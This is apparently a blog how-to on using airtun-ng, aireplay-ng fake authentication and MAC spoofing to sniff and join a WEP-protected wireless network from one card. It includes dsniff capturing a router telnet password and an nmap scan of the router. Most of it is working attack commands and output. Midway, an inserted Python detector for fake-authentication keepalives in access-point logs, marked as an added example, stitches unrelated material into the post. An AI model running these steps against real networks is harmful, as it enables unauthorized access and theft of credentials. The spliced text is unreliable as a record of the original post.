Using airtun-ng to monitor WLAN in real-time and be joined as a client via injection
In this post I will show you how to use airtun-ng to create a virtual interface that lets you monitor WLAN traffic in real time with an IDS or another packet sniffer, and at the same time inject traffic through that same virtual interface and effectively become a client of the network.
The following is the info for the AP in this demonstration:
The first thing we will do is make sure our card is in monitor mode on the appropriate channel:

airmon-ng stop ath0
airmon-ng start wifi0 11

Then we will run the following airtun-ng command:

bt ~ # airtun-ng -a 00:18:F8:F0:00:01 -w 5CE6A435786A4135A512EB6FB5 -t 1 ath0
created tap interface at0
WEP encryption specified. Sending and receiving frames through ath0.
ToDS bit set in all frames.

"-a" specifies the BSSID of the target AP and "-w" is the WEP key (I am assuming you already cracked/know it for this example). One important option is "-t". I specified a value of 1 for this example because I just want to communicate with the AP and/or wired clients. If you change it to 0, this should allow you to communicate with wireless clients. Try playing with this setting if you cannot reach certain hosts.
Also, if you receive the following error message...

error opening tap device: No such file or directory
try "modprobe tun"
error opening tap device: No such file or directory

...just run "modprobe tun" from the shell before starting airtun-ng.
So now that airtun-ng is running, we can use any packet capture utility we want to monitor the wireless traffic. This could be your Snort IDS, Wireshark for analysis, or driftnet to be creepy and grab web pics :p. Normally, utilities like these would give you "unknown data-link type" errors when trying to start the capture, but the at0 interface created by airtun-ng replays all traffic for us, decrypted with the WEP key and with the 802.11 headers removed, so it now looks like standard Ethernet to our sniffer programs. I used dsniff here to grab a telnet password to the wireless router:

bt ~ # dsniff -i at0
dsniff: listening on at0
03/07/09 20:15:19 tcp 192.168.1.105.49895 -> DD-WRT.23 (telnet)
Well, this is spectacular, but what if you want to take it further? You can't scan the network or perform MITM attacks without being able to send packets into the network. I guess you could always just use another wireless interface for this part, but that would defeat the purpose of this how-to! Also, if you are having trouble connecting to WEP networks with your current card driver, you could tunnel all your traffic through airtun-ng and take your driver limitations out of the equation (assuming your card supports injection). Plus, some people may only have one interface to work with.
First, we need to clone the MAC of the interface we are using to capture the wireless traffic and assign it to our at0 interface. Otherwise, the AP will not know what to do with our packets once it receives them: it needs to know the actual physical interface to respond to.

Checking the ath0 MAC:

bt ~ # ifconfig ath0
ath0 Link encap:UNSPEC HWaddr 00-15-6D-54-00-01-A8-0F-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1
RX packets:11808 errors:0 dropped:0 overruns:0 frame:0
TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
RX bytes:2880777 (2.7 MiB) TX bytes:227 (227.0 b)

Now let's assign it to our tunnel interface...

bt ~ # macchanger -m 00:15:6D:54:00:01 at0
Current MAC: 82:cf:78:7e:22:22 (unknown)
Faked MAC: 00:15:6d:54:00:01 (unknown)

Now it is assigned to our virtual interface.
And one final requirement before we can inject traffic: we need to associate ourselves with the target AP. For this we will use a simple aireplay-ng command. "-a" is the BSSID of our target AP, "--fakeauth 5" says to (re)associate every 5 seconds, and ath0 is our replay interface.

bt ~ # aireplay-ng -a 00:18:F8:F0:00:01 --fakeauth 5 ath0
No source MAC (-h) specified. Using the device MAC (00:15:6D:54:00:01)
20:13:05 Waiting for beacon frame (BSSID: 00:18:F8:F0:00:01) on channel 11
20:13:06 Sending Authentication Request (Open System) [ACK]
20:13:06 Authentication successful
20:13:06 Sending Association Request [ACK]
20:13:06 Association successful :-) (AID: 1)
Now we are good to go.
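From the AP's side, the fake-authentication keepalive above has a distinctive footprint: the same station re-associates every few seconds with no deauthentication or disassociation in between, which a genuine client only does after roaming or a dropped link. The following detector is an added example, not code from the original post; it scans a constructed hostapd-style AP syslog excerpt (the log format, hostname and timestamps are assumptions) for exactly that cadence.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed hostapd-style AP syslog excerpt (not from the original post). The
# first station is a normal client: it associates, later drops and re-associates.
# The second keeps associating every 5 s while already associated, the footprint
# a scripted "fakeauth 5" keepalive leaves in the AP's log.
SAMPLE_LOG = """\
Mar  7 20:12:40 ap hostapd: ath0: STA 00:1e:aa:bb:cc:dd IEEE 802.11: associated (aid 2)
Mar  7 20:13:06 ap hostapd: ath0: STA 00:15:6d:54:00:01 IEEE 802.11: associated (aid 1)
Mar  7 20:13:11 ap hostapd: ath0: STA 00:15:6d:54:00:01 IEEE 802.11: associated (aid 1)
Mar  7 20:13:16 ap hostapd: ath0: STA 00:15:6d:54:00:01 IEEE 802.11: associated (aid 1)
Mar  7 20:13:21 ap hostapd: ath0: STA 00:15:6d:54:00:01 IEEE 802.11: associated (aid 1)
Mar  7 20:14:00 ap hostapd: ath0: STA 00:1e:aa:bb:cc:dd IEEE 802.11: deauthenticated
Mar  7 20:14:03 ap hostapd: ath0: STA 00:1e:aa:bb:cc:dd IEEE 802.11: associated (aid 2)
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ hostapd: \S+: STA (?P<sta>[0-9a-fA-F:]{17}) "
    r"IEEE 802\.11: (?P<event>associated|disassociated|deauthenticated)"
)

def parse_events(text, year=2009):
    """Return (timestamp, station, event) tuples; syslog omits the year, so supply it."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["sta"].lower(), m["event"]))
    return sorted(events, key=lambda e: e[0])  # stable sort keeps log order on ties

def find_fakeauth_keepalives(text, min_repeats=3, max_gap_s=10.0):
    """Map station -> (surplus association count, mean gap in seconds) for stations
    that re-associate at least min_repeats times with no deauth/disassoc in between
    and never more than max_gap_s apart: a steady short cadence is the tell."""
    associated = {}                # station -> currently associated?
    redundant = defaultdict(list)  # station -> timestamps of surplus associations
    for ts, sta, event in parse_events(text):
        if event == "associated":
            if associated.get(sta):
                redundant[sta].append(ts)
            associated[sta] = True
        else:  # disassociated / deauthenticated
            associated[sta] = False
    hits = {}
    for sta, stamps in redundant.items():
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(stamps) >= max(min_repeats, 2) and max(gaps) <= max_gap_s:
            hits[sta] = (len(stamps), round(sum(gaps) / len(gaps), 1))
    return hits
```

Running find_fakeauth_keepalives(SAMPLE_LOG) flags only the second station, with three surplus associations about 5 seconds apart; the client that re-associates after a deauthentication is left alone.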
Let's bring up the at0 interface (airtun-ng will always start with the interface down) and see if the AP will give us an address via DHCP.

bt ~ # dhcpcd at0
bt ~ # ifconfig at0
at0 Link encap:Ethernet HWaddr 00:15:6D:54:00:01
inet addr:192.168.1.109 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
RX packets:11 errors:0 dropped:0 overruns:0 frame:0
TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
RX bytes:3290 (3.2 KiB) TX bytes:1240 (1.2 KiB)

Ta-da! We are now sniffing all wireless traffic for this AP in promiscuous mode, and are also joined to the network and can inject and receive packets like a normal host, all with the same physical interface.
Pinging the AP...

bt ~ # ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=4.98 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=2.33 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=2.34 ms
64 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=2.32 ms
64 bytes from 192.168.1.1: icmp_seq=5 ttl=64 time=2.33 ms
--- 192.168.1.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4001ms
rtt min/avg/max/mdev = 2.321/2.863/4.984/1.060 ms

A quick port scan... You will probably need to specify the interface to use for scanning with nmap. When I didn't, it gave me an error and defaulted to eth0. This may be the case with other programs also.
bt ~ # nmap -e at0 -F 192.168.1.1
Starting Nmap 4.85BETA3 ( hxxp://nmap.org ) at 2009-03-07 20:19 GMT
Interesting ports on DD-WRT (192.168.1.1):
Not shown: 97 closed ports
PORT STATE SERVICE
23/tcp open telnet
53/tcp open domain
80/tcp open http
MAC Address: 00:18:F8:FC:00:A0 (Cisco-Linksys)
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
So there you have it. If anyone has any pointers or criticisms please let me know. Thanks.